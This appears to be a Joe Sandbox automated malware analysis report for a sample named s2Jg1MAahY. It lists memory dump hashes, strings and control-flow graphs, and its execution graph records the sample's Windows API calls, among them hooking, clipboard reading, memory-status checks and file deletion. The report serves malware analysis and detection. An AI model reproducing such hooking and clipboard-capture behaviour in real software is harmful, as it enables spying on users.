                                                                                                                    • Instruction ID: d1a6f0f05f832c89d60ae782c29f2eca78bb6509d5cdd6c481282ad8e880c0d7
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: 3711BB79904680DFDB06CF54D5C4B15BFB2FB84224F24C6AED8494B6A6C33AD40ACB62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: {#L
                                                                                                                    • API String ID: 0-1361971085
                                                                                                                    • Opcode ID: ccb9690bf895613cdd753dc27c836c498cebcfd68c981a79bfc791b625901dc3
                                                                                                                    • Instruction ID: 7bf856685043981813485a0e47af8a8224eced460dd0a5455b18d0c55117b29b
                                                                                                                    • Opcode Fuzzy Hash: ccb9690bf895613cdd753dc27c836c498cebcfd68c981a79bfc791b625901dc3
                                                                                                                    • Instruction Fuzzy Hash: DDD108B1E15219DFCB18CFAAD58059EFBF2BF89310F14D52AD425AB228E7349942CF50
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: {#L
                                                                                                                    • API String ID: 0-1361971085
                                                                                                                    • Opcode ID: 4270e63a234110ae76ef26c480fad8a258aeab2436b31105e07271d0d3347ce9
                                                                                                                    • Instruction ID: ac459e584de4e833d5bd26aa704c3d2c0015cb709fbf9c6aebf123e5b98aaba8
                                                                                                                    • Opcode Fuzzy Hash: 4270e63a234110ae76ef26c480fad8a258aeab2436b31105e07271d0d3347ce9
                                                                                                                    • Instruction Fuzzy Hash: 70D1F8B1E15219DFCB18CFAAD58059DFBF2BF89310F14D52AD425AB228E7349942CF50
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: iUfo
                                                                                                                    • API String ID: 0-3820436262
                                                                                                                    • Opcode ID: 7fe180686c6ecdb5947114cf0314ce35d14525b23f8ac1f92ce8054c19484baf
                                                                                                                    • Instruction ID: 6b223d359ca63bbf3c8fbe9f274d53333cbecd610fe53b0f991e130dc69f7ca2
                                                                                                                    • Opcode Fuzzy Hash: 7fe180686c6ecdb5947114cf0314ce35d14525b23f8ac1f92ce8054c19484baf
                                                                                                                    • Instruction Fuzzy Hash: 2A5115B4E11219DFCF08CFAAD8455EEFBB2BF89300F10942AE815A7354EB345A418B64
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: iUfo
                                                                                                                    • API String ID: 0-3820436262
                                                                                                                    • Opcode ID: 464241df48a93e9ea94caae7f708cc81f8d233a183a4461b85f0bf8094897ccc
                                                                                                                    • Instruction ID: c1a2eaff0f9fd5a0282139c8af3d1337c57c46d80b36b07286a2923b24834220
                                                                                                                    • Opcode Fuzzy Hash: 464241df48a93e9ea94caae7f708cc81f8d233a183a4461b85f0bf8094897ccc
                                                                                                                    • Instruction Fuzzy Hash: B051F1B4E11219DFCF18CFAAD8495AEFBB2BF89304F10942AE815B7354EB3459418B64
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: w7e^
                                                                                                                    • API String ID: 0-1657886525
                                                                                                                    • Opcode ID: f4d5c89861067adedee9c78b3349971093a11cf33850e02d11efecc8a700029a
                                                                                                                    • Instruction ID: 50945076acf62ed853507e361b0e81db7210338108f91008db4f58d536331739
                                                                                                                    • Opcode Fuzzy Hash: f4d5c89861067adedee9c78b3349971093a11cf33850e02d11efecc8a700029a
                                                                                                                    • Instruction Fuzzy Hash: E44124B1D14219DFCF04CFAAC8445EEFBB1BB8A340F14A52AC826B7244D7384642CF69
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: w7e^
                                                                                                                    • API String ID: 0-1657886525
                                                                                                                    • Opcode ID: 876bd899ccf3e6f9ecc1f0e9ca3e1c37222ff5b1c00987aa78f9c0711f0eb8d7
                                                                                                                    • Instruction ID: d0a42ad50c8f91b458a9addea1170fc49cc0a5216a2356aa562c620c8eac9900
                                                                                                                    • Opcode Fuzzy Hash: 876bd899ccf3e6f9ecc1f0e9ca3e1c37222ff5b1c00987aa78f9c0711f0eb8d7
                                                                                                                    • Instruction Fuzzy Hash: 2E4156B1D1420AEFCF04CFAAC8441EEFBB1BB8A340F14952AC826B7254D3384646CF59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0ni
                                                                                                                    • API String ID: 0-1488673370
                                                                                                                    • Opcode ID: 170e7c6cfc576407fff6df80172f225b6c5ca9670e4ec580aaec0a12b8a9ce52
                                                                                                                    • Instruction ID: 92fa77665b9d59fc5aae67f457e37ab92d59e1b1c8ae628660b9e1c80ce60671
                                                                                                                    • Opcode Fuzzy Hash: 170e7c6cfc576407fff6df80172f225b6c5ca9670e4ec580aaec0a12b8a9ce52
                                                                                                                    • Instruction Fuzzy Hash: FC517DB1E056588FDB58CF6B8D4579AFBF3AFC9300F14C1EA980CA6265DB341A858F11
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0ni
                                                                                                                    • API String ID: 0-1488673370
                                                                                                                    • Opcode ID: dc2a8a52b992983b7bc639e48de8c683ddab90811eab9375828702cf0ef202f2
                                                                                                                    • Instruction ID: 3b3e523da9d539455a99530c5da7e6a9d294e6123d4a4c26814005171156b82e
                                                                                                                    • Opcode Fuzzy Hash: dc2a8a52b992983b7bc639e48de8c683ddab90811eab9375828702cf0ef202f2
                                                                                                                    • Instruction Fuzzy Hash: AB514CB1E156188BDB68CF6B8D4579EFBF3AFC8300F14C1BA990CA6254DB301A858F51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ab57f46bc2184cde9d78525f2442426b85b422850a2322ba55ac0482c919ab64
                                                                                                                    • Instruction ID: 63cf7838ae7e273ba2d2a6ec9720c1667bb0e8106a391fe03a32809bb4b4022b
                                                                                                                    • Opcode Fuzzy Hash: ab57f46bc2184cde9d78525f2442426b85b422850a2322ba55ac0482c919ab64
                                                                                                                    • Instruction Fuzzy Hash: 33E10EB4E1021A8FCB14DF99C5849AEFBB2FF89315F248169D815AB359D730AD41CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 63710918b016513c67945cdfd01d91ad0eaf5ba3b4c2176cdfa636cb0f8647c8
                                                                                                                    • Instruction ID: 6f3ebc43f6a0049c72746d3495b66695571c4f585f47b4cbc2659342fc08ab0c
                                                                                                                    • Opcode Fuzzy Hash: 63710918b016513c67945cdfd01d91ad0eaf5ba3b4c2176cdfa636cb0f8647c8
                                                                                                                    • Instruction Fuzzy Hash: 04E12EB4E0021A8FCB14DFA9C5849AEFBF2FF89315F248169D815AB359D730A941CF61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1808f45896d0e69010751ffe7005c148d12663423533879cb9698b82d853d63c
                                                                                                                    • Instruction ID: aa1d9d175d785cbd69f8fe8b614a523a58a2ba5b59e2e9e5d712703a490d6ec7
                                                                                                                    • Opcode Fuzzy Hash: 1808f45896d0e69010751ffe7005c148d12663423533879cb9698b82d853d63c
                                                                                                                    • Instruction Fuzzy Hash: 55E12CB4E141198FCB14DFA9C5809AEFBF2FF89305F248269E815AB355D730A942CF61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1be1d762a6506f94c28fbda87196d8d0ca3e3f241e51e9c62d3ab102ec0b3f5b
                                                                                                                    • Instruction ID: eadec63f7f0dbe05b844ac3893668a14734d5cfe4edae36b74f57146efd63da5
                                                                                                                    • Opcode Fuzzy Hash: 1be1d762a6506f94c28fbda87196d8d0ca3e3f241e51e9c62d3ab102ec0b3f5b
                                                                                                                    • Instruction Fuzzy Hash: 68E11EB4E102198FCB14DF99C5809AEFBB2FF89315F248269D815AB359D731AD42CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05e0f51efd744d627e2c24a7949bccf880d4ac9807cd7f3b4cec12cd51e53451
                                                                                                                    • Instruction ID: c088b50381977b1c3deb6e893f69a2e4e6ebfa5be89e9c0a64f77368666224e3
                                                                                                                    • Opcode Fuzzy Hash: 05e0f51efd744d627e2c24a7949bccf880d4ac9807cd7f3b4cec12cd51e53451
                                                                                                                    • Instruction Fuzzy Hash: BFE10DB4E141198FCB14DFA9C5849AEFBF2FF89305F248169E815AB359D730A942CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4eb1071914c7d6dfbddf021fec1441430b098f950e9af2e66246afd9253cd468
                                                                                                                    • Instruction ID: 66a9c3d3abfec0887ca06a8359dee515408567fd59654a194c4253fba64c1aa8
                                                                                                                    • Opcode Fuzzy Hash: 4eb1071914c7d6dfbddf021fec1441430b098f950e9af2e66246afd9253cd468
                                                                                                                    • Instruction Fuzzy Hash: 0BA17032E002168FCF19DFB5D94059EBBB2FFD9300B15856AE905AB275DB71D90ACB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fc49751ab2d7527adf1df9b460198c89c21a3d45e64c89a9ec81146332345a15
                                                                                                                    • Instruction ID: 5978fe53b975b9d2be499e402adaef021a45795cb67242246ccfd70aa5251f97
                                                                                                                    • Opcode Fuzzy Hash: fc49751ab2d7527adf1df9b460198c89c21a3d45e64c89a9ec81146332345a15
                                                                                                                    • Instruction Fuzzy Hash: 8A81F9B4E101698FCB54DF6AC5805AEFBB6FF89305F24C2A9D818A7315D7309A41CF61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eab1d5793a0b9e1f45a1a99f4809660944a31bb8fd6c6aa1c4b996886297b94e
                                                                                                                    • Instruction ID: c55c910b5a44594ef3d443720c5c0db511cfd18d910294a95b42118eff9adad2
                                                                                                                    • Opcode Fuzzy Hash: eab1d5793a0b9e1f45a1a99f4809660944a31bb8fd6c6aa1c4b996886297b94e
                                                                                                                    • Instruction Fuzzy Hash: 5C8109B4E102698FCB54DF6AC5805AEFBB2FF89305F24D1A9D818A7315D7309A41CF61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6e1e8064c8dcd82ca15d002950e6174a4fb37609ba5986d1b1b3b3ace39be38
                                                                                                                    • Instruction ID: a8bc4be70dd8cdd0bf5fff18589ef574493e0c3d39fb21b167b322e1c8bd90a9
                                                                                                                    • Opcode Fuzzy Hash: b6e1e8064c8dcd82ca15d002950e6174a4fb37609ba5986d1b1b3b3ace39be38
                                                                                                                    • Instruction Fuzzy Hash: B1412EB0E1520ADFCB44CFA6D5416AEFFF2BF99300F20946AC415B7264E37457458B94
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 09e29fb41358975fa5830aa401dfb143d09428ecf884c695f689e8e78e594747
                                                                                                                    • Instruction ID: 5daaaaa3dc328064c8a0e406baa06d47b3dd7954c9806ea144450429125b3d47
                                                                                                                    • Opcode Fuzzy Hash: 09e29fb41358975fa5830aa401dfb143d09428ecf884c695f689e8e78e594747
                                                                                                                    • Instruction Fuzzy Hash: 9A415EB0E1530ADFCB04CFA5C5416AEFFF2BF99200F24946AC415B72A4D37446058B95

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:11.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:130
                                                                                                                    Total number of Limit Nodes:14
                                                                                                                    execution_graph 38233 6da9ed8 DuplicateHandle 38234 6da9f6e 38233->38234 38235 6da5fd8 38236 6da6010 CreateWindowExW 38235->38236 38238 6da60fc 38236->38238 38239 6dab918 38240 6dab923 38239->38240 38241 6dab933 38240->38241 38243 6dab3b8 38240->38243 38244 6dab968 OleInitialize 38243->38244 38245 6dab9cc 38244->38245 38245->38241 38344 6da4f2f 38345 6da4f30 GetModuleHandleW 38344->38345 38347 6da4fa5 38345->38347 38246 18e0848 38248 18e084e 38246->38248 38247 18e091b 38248->38247 38250 18e1340 38248->38250 38253 18e1343 38250->38253 38251 18e1454 38251->38248 38253->38251 38256 18e8219 38253->38256 38261 6da3318 38253->38261 38267 6da3348 38253->38267 38257 18e8223 38256->38257 38258 18e82d9 38257->38258 38273 6dbfa80 38257->38273 38277 6dbfa70 38257->38277 38258->38253 38262 6da331d 38261->38262 38265 6da340b 38262->38265 38281 6da3084 38262->38281 38264 6da33d1 38286 6da30a4 38264->38286 38265->38253 38268 6da335a 38267->38268 38269 6da3084 GetModuleHandleW 38268->38269 38271 6da340b 38268->38271 38270 6da33d1 38269->38270 38272 6da30a4 KiUserCallbackDispatcher 38270->38272 38271->38253 38272->38271 38275 6dbfa95 38273->38275 38274 6dbfca6 38274->38258 38275->38274 38276 6dbfcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 38275->38276 38276->38275 38278 6dbfa80 38277->38278 38279 6dbfca6 38278->38279 38280 6dbfcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 38278->38280 38279->38258 38280->38278 38282 6da308f 38281->38282 38290 6da44fb 38282->38290 38296 6da4500 38282->38296 38283 6da35aa 38283->38264 38287 6da30af 38286->38287 38289 6dab08b 38287->38289 38319 6da9b0c 38287->38319 38289->38265 38291 6da4500 38290->38291 38302 6da4a7b 38291->38302 38292 6da45ae 38293 6da3864 GetModuleHandleW 38292->38293 38294 6da45da 38292->38294 38293->38294 38297 6da452b 38296->38297 38301 6da4a7b GetModuleHandleW 38297->38301 38298 6da45ae 38299 6da3864 GetModuleHandleW 38298->38299 38300 6da45da 38298->38300 38299->38300 38301->38298 38303 6da4aad 38302->38303 38304 6da4b2e 38303->38304 38306 6da4c13 38303->38306 38315 6da3864 38306->38315 38308 6da4c29 38309 6da3864 GetModuleHandleW 38308->38309 38314 6da4df4 38308->38314 38310 6da4d7a 38309->38310 38311 6da3864 GetModuleHandleW 38310->38311 38310->38314 38312 6da4dc8 38311->38312 38313 6da3864 GetModuleHandleW 38312->38313 38312->38314 38313->38314 38314->38304 38316 6da4f30 GetModuleHandleW 38315->38316 38318 6da4fa5 38316->38318 38318->38308 38320 6dab0a0 KiUserCallbackDispatcher 38319->38320 38322 6dab10e 38320->38322 38322->38287 38337 6dabab2 38338 6dabb0a OleGetClipboard 38337->38338 38339 6dabb4a 38338->38339 38323 6da9c90 38324 6da9c91 GetCurrentProcess 38323->38324 38326 6da9d28 GetCurrentThread 38324->38326 38327 6da9d21 38324->38327 38328 6da9d5e 38326->38328 38329 6da9d65 GetCurrentProcess 38326->38329 38327->38326 38328->38329 38332 6da9d9b 38329->38332 38330 6da9dc3 GetCurrentThreadId 38331 6da9df4 38330->38331 38332->38330 38340 6dad5f0 38341 6dad634 SetWindowsHookExA 38340->38341 38343 6dad67a 38341->38343 38333 18e8040 38334 18e8086 DeleteFileW 38333->38334 38336 18e80bf 38334->38336 38348 14fd030 38349 14fd048 38348->38349 38350 14fd0a2 38349->38350 38355 6da6182 38349->38355 38359 6da399c 38349->38359 38367 6da6190 38349->38367 38371 6daaab3 38349->38371 38356 6da618d 38355->38356 38357 6da399c CallWindowProcW 38356->38357 38358 6da61d7 38357->38358 38358->38350 38362 6da39a7 38359->38362 38360 6daab41 38364 6daab3f 38360->38364 38388 6da9ab4 38360->38388 38362->38360 38363 6daab31 38362->38363 38380 6daac58 38363->38380 38384 6daac68 38363->38384 38368 6da61b6 38367->38368 38369 6da399c CallWindowProcW 38368->38369 38370 6da61d7 38369->38370 38370->38350 38372 6daaaba 38371->38372 38373 6daaaca 38371->38373 38372->38350 38374 6daab41 38373->38374 38376 6daab31 38373->38376 38375 6da9ab4 CallWindowProcW 38374->38375 38377 6daab3f 38374->38377 38375->38377 38378 6daac58 CallWindowProcW 38376->38378 38379 6daac68 CallWindowProcW 38376->38379 38378->38377 38379->38377 38382 6daac68 38380->38382 38381 6da9ab4 CallWindowProcW 38381->38382 38382->38381 38383 6daad4e 38382->38383 38383->38364 38386 6daac76 38384->38386 38385 6da9ab4 CallWindowProcW 38385->38386 38386->38385 38387 6daad4e 38386->38387 38387->38364 38389 6da9abf 38388->38389 38390 6daae02 CallWindowProcW 38389->38390 38391 6daadb1 38389->38391 38390->38391 38391->38364

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 124 6db3578-6db3599 125 6db359b-6db359e 124->125 126 6db3d3f-6db3d42 125->126 127 6db35a4-6db35c3 125->127 128 6db3d68-6db3d6a 126->128 129 6db3d44-6db3d63 126->129 137 6db35dc-6db35e6 127->137 138 6db35c5-6db35c8 127->138 131 6db3d6c 128->131 132 6db3d71-6db3d74 128->132 129->128 131->132 132->125 134 6db3d7a-6db3d83 132->134 142 6db35ec-6db35fb 137->142 138->137 139 6db35ca-6db35da 138->139 139->142 253 6db35fd call 6db3d98 142->253 254 6db35fd call 6db3d91 142->254 143 6db3602-6db3607 144 6db3609-6db360f 143->144 145 6db3614-6db38f1 143->145 144->134 166 6db3d31-6db3d3e 145->166 167 6db38f7-6db39a6 145->167 176 6db39a8-6db39cd 167->176 177 6db39cf 167->177 179 6db39d8-6db39eb call 6db2370 176->179 177->179 182 6db3d18-6db3d24 179->182 183 6db39f1-6db3a13 call 6db237c 179->183 182->167 184 6db3d2a 182->184 183->182 187 6db3a19-6db3a23 183->187 184->166 187->182 188 6db3a29-6db3a34 187->188 188->182 189 6db3a3a-6db3b10 188->189 201 6db3b1e-6db3b4e 189->201 202 6db3b12-6db3b14 189->202 206 6db3b5c-6db3b68 201->206 207 6db3b50-6db3b52 201->207 202->201 208 6db3b6a-6db3b6e 206->208 209 6db3bc8-6db3bcc 206->209 207->206 208->209 212 6db3b70-6db3b9a 208->212 210 6db3d09-6db3d12 209->210 211 6db3bd2-6db3c0e 209->211 210->182 210->189 223 6db3c1c-6db3c2a 211->223 224 6db3c10-6db3c12 211->224 219 6db3ba8-6db3bc5 call 6db2388 212->219 220 6db3b9c-6db3b9e 212->220 219->209 220->219 227 6db3c2c-6db3c37 223->227 228 6db3c41-6db3c4c 223->228 224->223 227->228 231 6db3c39 227->231 232 6db3c4e-6db3c54 228->232 233 6db3c64-6db3c75 228->233 231->228 234 6db3c58-6db3c5a 232->234 235 6db3c56 232->235 237 6db3c8d-6db3c99 233->237 238 6db3c77-6db3c7d 233->238 234->233 235->233 242 6db3c9b-6db3ca1 237->242 243 6db3cb1-6db3d02 237->243 239 6db3c7f 238->239 240 6db3c81-6db3c83 238->240 239->237 240->237 244 6db3ca3 242->244 245 6db3ca5-6db3ca7 242->245 243->210 244->243 245->243 253->143 254->143
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: d15161629552a23da957bd62f5fb5e6cd5434b8e431a54b9fd3f5118c8effb11
                                                                                                                    • Instruction ID: 04296ae28989513abe7d685f2429c0510721e8ef4ce8941acf10d7b366b45a65
                                                                                                                    • Opcode Fuzzy Hash: d15161629552a23da957bd62f5fb5e6cd5434b8e431a54b9fd3f5118c8effb11
                                                                                                                    • Instruction Fuzzy Hash: DE322D31E1071ACFCB15DF78D85459DB7B6FF89300F1196A9D40AAB224EF30A985CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 676 6db7e90-6db7eae 677 6db7eb0-6db7eb3 676->677 678 6db7eb5-6db7ecf 677->678 679 6db7ed4-6db7ed7 677->679 678->679 680 6db7ed9-6db7ee7 679->680 681 6db7eee-6db7ef1 679->681 691 6db7ee9 680->691 692 6db7f36-6db7f4c 680->692 683 6db7ef3-6db7f0f 681->683 684 6db7f14-6db7f17 681->684 683->684 685 6db7f19-6db7f23 684->685 686 6db7f24-6db7f26 684->686 688 6db7f28 686->688 689 6db7f2d-6db7f30 686->689 688->689 689->677 689->692 691->681 696 6db7f52-6db7f5b 692->696 697 6db8167-6db8171 692->697 698 6db8172-6db81a7 696->698 699 6db7f61-6db7f7e 696->699 702 6db81a9-6db81ac 698->702 708 6db8154-6db8161 699->708 709 6db7f84-6db7fac 699->709 703 6db81b2-6db81c1 702->703 704 6db83e1-6db83e4 702->704 714 6db81c3-6db81de 703->714 715 6db81e0-6db8224 703->715 706 6db8407-6db840a 704->706 707 6db83e6-6db8402 704->707 711 6db8410-6db841c 706->711 712 6db84b5-6db84b7 706->712 707->706 708->696 708->697 709->708 731 6db7fb2-6db7fbb 709->731 720 6db8427-6db8429 711->720 717 6db84b9 712->717 718 6db84be-6db84c1 712->718 714->715 732 6db822a-6db823b 715->732 733 6db83b5-6db83cb 715->733 717->718 718->702 719 6db84c7-6db84d0 718->719 721 6db842b-6db8431 720->721 722 6db8441-6db8445 720->722 727 6db8433 721->727 728 6db8435-6db8437 721->728 729 6db8453 722->729 730 6db8447-6db8451 722->730 727->722 728->722 735 6db8458-6db845a 729->735 730->735 731->698 736 6db7fc1-6db7fdd 731->736 741 6db8241-6db825e 732->741 742 6db83a0-6db83af 732->742 733->704 738 6db846b-6db84a4 735->738 739 6db845c-6db845f 735->739 746 6db7fe3-6db800d 736->746 747 6db8142-6db814e 736->747 738->703 759 6db84aa-6db84b4 738->759 739->719 741->742 753 6db8264-6db835a call 6db66b0 741->753 742->732 742->733 760 6db8138-6db813d 746->760 761 6db8013-6db803b 746->761 747->708 747->731 809 6db8368 753->809 810 6db835c-6db8366 753->810 760->747 761->760 767 6db8041-6db806f 761->767 767->760 773 6db8075-6db807e 767->773 773->760 775 6db8084-6db80b6 773->775 782 6db80b8-6db80bc 775->782 783 6db80c1-6db80dd 775->783 782->760 784 6db80be 782->784 783->747 785 6db80df-6db8136 call 6db66b0 783->785 784->783 785->747 811 6db836d-6db836f 809->811 810->811 811->742 812 6db8371-6db8376 811->812 813 6db8378-6db8382 812->813 814 6db8384 812->814 815 6db8389-6db838b 813->815 814->815 815->742 816 6db838d-6db8399 815->816 816->742
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 910ceba9dc763b9602c51858af58ea2f6677d56c0eedd663d5095badd7c24228
                                                                                                                    • Instruction ID: b8d51b900c2d07ec64a8bf40fd7aed0dc643cb25d39abc1e7a050564b311bec9
                                                                                                                    • Opcode Fuzzy Hash: 910ceba9dc763b9602c51858af58ea2f6677d56c0eedd663d5095badd7c24228
